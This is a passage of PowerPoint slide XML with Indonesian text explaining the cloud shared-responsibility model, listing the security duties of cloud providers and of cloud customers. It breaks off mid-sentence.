            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjabarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas-tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> batas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memperkenalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Anda.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elemen-elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DDoS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>isolasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyewa</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> wilayah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SaaS, PaaS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IaaS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
